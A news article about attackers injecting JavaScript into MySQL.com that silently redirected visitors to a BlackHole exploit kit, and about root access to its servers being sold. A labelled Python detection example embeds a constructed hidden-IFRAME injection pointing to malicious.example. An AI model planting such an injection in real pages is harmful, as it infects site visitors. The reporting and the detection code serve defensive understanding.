
MySQL.com Hit By Malware Infection

Unknown attackers compromised the main website of open-source database MySQL and served malware to unsuspecting visitors for a short period of time on 26 September.

Attackers injected JavaScript code into MySQL.com, owned by Oracle, to divert visitors to malicious websites hosting the BlackHole exploit kit, which automatically downloaded malware to the victimised computers, according to Wayne Huang, founder, president and chief executive of Armorize Technologies. The company said the attack has been disabled and the site is no longer serving up malware.

Malicious JavaScript

The main page of MySQL.com was compromised to force visitors to load a JavaScript file, Huang wrote on the Armorize blog. The file created an IFRAME that redirected the victim, without their knowledge, first to a page at falosfax.in, hosted in Florida, and then to a .cx.cc domain hosted in Sweden.

Once on the page, the BlackHole kit hosted on the site exploited the user’s web browser and its installed plug-ins to download malware. For this attack, the attackers modified a JavaScript file used by the Omniture SiteCatalyst plug-in, which tracks website metrics.

“The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection,” Huang wrote.

BlackHole is a widely used kit that contains pre-loaded exploits for vulnerabilities in web browsers and in other web components and plug-ins, such as Flash Player, Adobe Reader and Java. It takes advantage of unpatched software to compromise the machine. The drive-by download is a common technique and often relies on JavaScript to silently redirect users to malicious sites without their knowledge.
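As an added illustration, not taken from the article or from any of the vendors it quotes, the Python below shows two checks a site operator could run to catch the pattern described above: comparing a served JavaScript asset against a known-good hash, and flagging any IFRAME whose source host lies outside the site's own domains. The file name, the sample scripts and the malicious.example host are constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample assets: a clean analytics script and a tampered copy
# that appends a hidden IFRAME injection, the pattern described in the article.
CLEAN_JS = b"var s = s_gi('site');\ns.pageName = document.title;\ns.t();\n"
TAMPERED_JS = CLEAN_JS + (
    b"document.write('<iframe src=\"http://malicious.example/\" "
    b"width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');\n"
)
# Constructed page with an IFRAME to the site's own host (should not be flagged).
SAMPLE_HTML = '<html><body><iframe src="https://www.mysql.com/downloads/"></iframe></body></html>'

# Known-good hashes, as a deployment pipeline would record them (hypothetical file name).
BASELINE = {"s_code.js": hashlib.sha256(CLEAN_JS).hexdigest()}
SITE_HOSTS = {"mysql.com", "www.mysql.com"}

IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def check_integrity(name, served, baseline=BASELINE):
    """Return True only if the served bytes hash to the recorded baseline value."""
    return hashlib.sha256(served).hexdigest() == baseline.get(name)


def foreign_iframes(text, site_hosts=SITE_HOSTS):
    """Return IFRAME src URLs whose host is not one of the site's own hosts.

    Relative sources (no host) are ignored; scheme-less //host/ forms are checked.
    """
    hits = []
    for src in IFRAME_SRC_RE.findall(text):
        host = urlparse(src).hostname
        if host and host.lower() not in site_hosts:
            hits.append(src)
    return hits


if __name__ == "__main__":
    print("baseline match:", check_integrity("s_code.js", TAMPERED_JS))
    print("off-site iframes:", foreign_iframes(TAMPERED_JS.decode()))
```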

Eight out of 44 major security vendors currently detect the malware, according to malware tracker VirusTotal.

Root access sold

Trend Micro researchers found evidence that attackers were selling root access to some of the cluster servers of mysql.com and its subdomains on underground criminal forums. The seller was offering a shell console window with root access to these servers for $3,000 (£1,900), Maxim Goncharov, a senior threat researcher at Trend Micro, wrote on the Malware blog.

Cyber-criminals are “brazen” enough to sell administrative access to specific systems, Goncharov wrote.

It appears that the site was initially compromised by JavaScript malware of a kind often associated with stolen FTP passwords, according to researchers at Sucuri Security. The malware likely compromised a computer belonging to a member of the MySQL.com team and stole the password from the FTP client, Sucuri researchers wrote on the blog.

MySQL is an open-source database that was originally owned by an independent entity, but was purchased by Sun Microsystems in 2008. It later became part of Oracle when that company bought Sun in 2009. Trend Micro’s Goncharov said the team contacted MySQL last week but hadn’t received a response. The site appeared to be serving up malware for a roughly three-hour window in the middle of the day.

With root access available for sale, it is possible that the malicious perpetrator who originally compromised mysql.com is not the one responsible for the BlackHole attack that served up malware on the site.

Fahmida Y Rashid eWEEK USA 2014. Ziff Davis Enterprise Inc. All Rights Reserved.
